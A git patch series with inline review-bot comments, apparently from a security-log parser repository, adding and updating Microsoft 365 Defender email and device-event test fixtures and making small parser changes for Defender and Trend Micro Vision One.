@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json 
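Review bot: `AuthenticationDetails` survives only as a re-serialized JSON string (`"{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}"`), so the SPF/DKIM/DMARC verdicts, the most useful signal for sender spoofing, are not addressable as fields; the parser (outside this hunk) should unpack them, e.g. into `email.authentication.spf` / `dkim` / `dmarc`, and this fixture should expect those keys. The input also uses identical values for `SenderMailFromAddress` (envelope) and `SenderFromAddress` (header), so a parser that confuses the two, which is precisely the spoofing case where they differ, would still pass; give the input two different addresses and assert which one lands in `email.from.address`. `email.direction`, `source.ip` and `related.ip` look right.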
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file From 94649a4b22251fe173eb508355223e3f8e67a851 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:16:03 +0100 Subject: [PATCH 281/317] Enhanced smart descriptions --- .../_meta/smart-descriptions.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 6232e66f8..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -9,6 +9,17 @@ { "field": "action.type" } ] }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ 
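Review bot: This fixture is a near-copy of test_email_delivered.json: same category, same `Delivered` / `Inbound` / `Allow` values, same null `SenderIPv6`, same `AuthenticationDetails` verdicts, only the domain and identifiers differ, so it exercises no parser branch the first file does not. Either drop it or make it earn its place by varying a dimension the parser must handle, such as an IPv6 sender with `SenderIPv4: null`, a `DKIM` or `DMARC` failure, or a non-empty `ThreatTypes` / `DetectionMethods`, and assert the resulting `event.type` and `related.ip`.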
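Review bot: The new template renders `action.type` verbatim, so with a value such as `MessageReadReceiptReceived` (which appears to be the `action.type` of the cloud-app fixture earlier in this patch) the description reads "New MessageReadReceiptReceived incident received: …", doubling "received" and labelling a plain activity record as an incident. Prefer wording that does not pre-judge severity, e.g. `"value": "{action.type} on {microsoft.defender.investigation.name}"`, or restrict the rule to datasets where `microsoft.defender.investigation.name` really names an incident; as written the conditions only require the field to be present.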
From 1bb05b973e9cb21fae745b7ce6eabd0f184a55eb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 13:55:16 +0100 Subject: [PATCH 282/317] Deleted device_events exceptions --- .../microsoft-365-defender/ingest/parser.yml | 4 +- ...test_device_event_sensitive_file_read.json | 81 +++++++++---------- .../tests/test_device_events_2.json | 11 ++- ..._device_events_shell_link_create_file.json | 74 +++++++++-------- .../tests/test_device_process_created.json | 8 +- .../test_devices_events_script_content.json | 11 ++- 6 files changed, 91 insertions(+), 98 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f60d9b6f0..0a33f577f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -41,9 +41,9 @@ pipeline:
       output_field: "data"
   - name: set_common_fields
   - name: set_process_events
-    filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
+    filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'
   - name: set_process_deviceprocess_events
-    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}'
   - name: set_alert_evidence_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
   - name: set_alert_info_fields
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
index fedd99aea..413d002c1 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
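Review bot: Dropping the ActionType list silently changes the output schema for every DeviceEvents record that was not in it (SensitiveFileRead, ShellLinkCreateFileEvent and ScriptContent in the fixtures updated by this commit): what used to land in `process.parent.*` now lands in `process.*`, and `process.parent.*` now holds `InitiatingProcessParent*`. Any detection rule or dashboard written against `process.parent.command_line` or `process.parent.hash.*` for those events will keep matching nothing without any error, so this deserves a changelog entry and a sweep of existing rules, not only updated tests. The two stages should also say why both still exist; above `- name: set_process_events` I would add `# DeviceProcessEvents describe a created process, so their InitiatingProcess* fields are the parent; every other category (DeviceEvents, DeviceLogonEvents, ...) maps InitiatingProcess* to process.* directly.`, noting that I infer the DeviceProcessEvents half from the stage name and the diffstat's test_device_process_created.json rather than from visible code. One side benefit worth recording in the commit message: the removed filter called `.lower()` on `properties.get("ActionType")`, which would have raised on a DeviceEvents record lacking ActionType, and the new expression cannot.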
@@ -24,18 +24,16 @@
       "properties": {
         "AccountSid": "S-1-2-3",
         "process": {
-          "parent": {
-            "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
-            "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
-            "FileSize": 3316224,
-            "LogonId": "5223047",
-            "VersionInfoCompanyName": "Test Corporation",
-            "VersionInfoFileDescription": "Browser EXE",
-            "VersionInfoInternalFileName": "Browser.EXE",
-            "VersionInfoOriginalFileName": "Browser.EXE",
-            "VersionInfoProductName": "Test Product",
-            "VersionInfoProductVersion": "1, 0, 0, 1"
-          }
+          "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
+          "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+          "FileSize": 3316224,
+          "LogonId": "5223047",
+          "VersionInfoCompanyName": "Test Corporation",
+          "VersionInfoFileDescription": "Browser EXE",
+          "VersionInfoInternalFileName": "Browser.EXE",
+          "VersionInfoOriginalFileName": "Browser.EXE",
+          "VersionInfoProductName": "Test Product",
+          "VersionInfoProductVersion": "1, 0, 0, 1"
         }
       },
       "type": "SensitiveFileRead"
@@ -57,37 +55,38 @@
 }
 },
 "process": {
- "name": "FileName.mdb",
+ "args": [
+ "/DBMode",
+ "/Network",
+ "/ProjectID",
+ "/Ticket",
+ "0",
+ "0",
+ "12345678-1234-5678-9012-345678901234",
+ "123456789"
+ ],
+ "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+ "executable": "c:\\program files (x86)\\browser.exe",
+ "hash": {
+ "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+ },
+ "name": "browser.exe",
 "parent": {
- "args": [
- "/DBMode",
- "/Network",
- "/ProjectID",
- "/Ticket",
- "0",
- "0",
- "12345678-1234-5678-9012-345678901234",
- "123456789"
- ],
- "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
- "executable": "c:\\program files (x86)\\browser.exe",
- "hash": {
- "md5": "51a9cac9c4e8da44ffd7502be17604ee",
- "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
- "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
- },
- "name": "browser.exe",
- "pid": 1328,
- "start": "2024-11-12T10:17:23.990532Z",
- "user": {
- "domain": "company",
- "email": "USERNAME@COMPANY.COM",
- "id": "S-1-2-3",
- "name": "username"
- },
- "working_directory": "c:\\program files (x86)"
+ "name": "Windows.exe",
+ "pid": 1820,
+ "start": "2024-10-14T05:47:54.324381Z"
+ },
+ "pid": 1328,
+ "start": "2024-11-12T10:17:23.990532Z",
+ "user": {
+ "domain": "company",
+ "email": "USERNAME@COMPANY.COM",
+ "id": "S-1-2-3",
+ "name": "username"
 },
- "working_directory": "C:"
+ "working_directory": "c:\\program files (x86)"
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 494baa569..4964dae1f 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -17,9 +17,7 @@
 "action": {
 "properties": {
 "process": {
- "parent": {
- "LogonId": "0"
- }
+ "LogonId": "0"
 }
 },
 "type": "ScriptContent"
@@ -42,9 +40,10 @@
 },
 "process": {
 "parent": {
- "pid": 417271,
- "start": "2024-10-22T15:09:08.624070Z"
- }
+ "pid": 0
+ },
+ "pid": 417271,
+ "start": "2024-10-22T15:09:08.624070Z"
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
index 37a646715..48696c644 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
@@ -23,18 +23,16 @@
 "action": {
 "properties": {
 "process": {
- "parent": {
- "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
- "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
- "FileSize": 1621656,
- "LogonId": "8066492",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Word",
- "VersionInfoInternalFileName": "WinWord",
- "VersionInfoOriginalFileName": "WinWord.exe",
- "VersionInfoProductName": "Microsoft Office",
- "VersionInfoProductVersion": "16.0.17928.20216"
- }
+ "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+ "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "FileSize": 1621656,
+ "LogonId": "8066492",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft Word",
+ "VersionInfoInternalFileName": "WinWord",
+ "VersionInfoOriginalFileName": "WinWord.exe",
+ "VersionInfoProductName": "Microsoft Office",
+ "VersionInfoProductVersion": "16.0.17928.20216"
 }
 },
 "type": "ShellLinkCreateFileEvent"
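Review bot: The second hunk of this file now pins `"parent": { "pid": 0 }` in the expected output, and the test_devices_events_script_content.json hunk further down does the same; a parent pid of 0 is most likely the source's placeholder for an unknown parent rather than a real process, so the fixture is locking a misleading `process.parent.pid` into the parser's contract. Presumably the parser copies the source parent-id field unconditionally — I would have it skip the assignment when the value is 0, so that detection rules keyed on parent pid never see a spurious match, and then drop the `"pid": 0` object from both expected blocks. The parser stage that sets this field is outside this hunk.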
@@ -60,34 +58,34 @@
 }
 },
 "process": {
- "name": "FILENAME.LNK",
+ "args": [
+ "\"\"",
+ "\"I:\\COMPANY\\Service\\FILE.doc\"",
+ "/n",
+ "/o"
+ ],
+ "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
+ "hash": {
+ "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+ },
+ "name": "winword.exe",
 "parent": {
- "args": [
- "\"\"",
- "\"I:\\COMPANY\\Service\\FILE.doc\"",
- "/n",
- "/o"
- ],
- "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
- "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
- "hash": {
- "md5": "51a9cac9c4e8da44ffd7502be17604ee",
- "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
- "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
- },
- "name": "winword.exe",
- "pid": 20948,
- "start": "2024-11-12T10:02:28.777910Z",
- "user": {
- "domain": "company",
- "email": "JOHNDOE@COMPANY.COM",
- "id": "S-1-2-3",
- "name": "jdoe"
- },
- "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16"
+ "name": "explorer.exe",
+ "pid": 14616,
+ "start": "2024-11-12T08:47:41.952077Z"
+ },
+ "pid": 20948,
+ "start": "2024-11-12T10:02:28.777910Z",
+ "user": {
+ "domain": "company",
+ "email": "JOHNDOE@COMPANY.COM",
+ "id": "S-1-2-3",
+ "name": "jdoe"
 },
- "start": "2024-11-06T16:05:23.113802Z",
- "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office"
+ "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16"
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index 7acf31f01..cd2ca7981 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,11 +29,9 @@ } }, "process": { - "parent": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" - } + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index 72f93da4e..c632ebbfa 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" - } + "pid": 0 + }, + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" }, "related": { "hash": [ From 3c5af0dd65f309e8d14b9d0a538745160ca82713 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 25 Nov 2024 12:09:53 +0200 Subject: [PATCH 283/317] Fixes and improvements --- .../trend-micro-vision-one/_meta/manifest.yml | 2 +- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 10 ++++++++-- .../tests/test_internal_network_scanner.json | 8 +++----- .../trend-micro-vision-one/tests/test_process.json | 12 ++++++++---- .../trend-micro-vision-one/tests/test_registry.json | 12 +++++++----- 5 files changed, 27 insertions(+), 17 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index 8363b7b96..da8360194 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml 
@@ -1,7 +1,7 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend Micro Vision One +name: Trend Micro Vision One [BETA] slug: trend-micro-vision-one description: >- diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index a13ee54b2..3446a59f6 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,8 +25,6 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" @@ -39,6 +37,14 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\')[0]}}" + user.domain: "{{final.user.id.split('\\\\')[1]}}" + filter: "{{final.user.id != null}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" 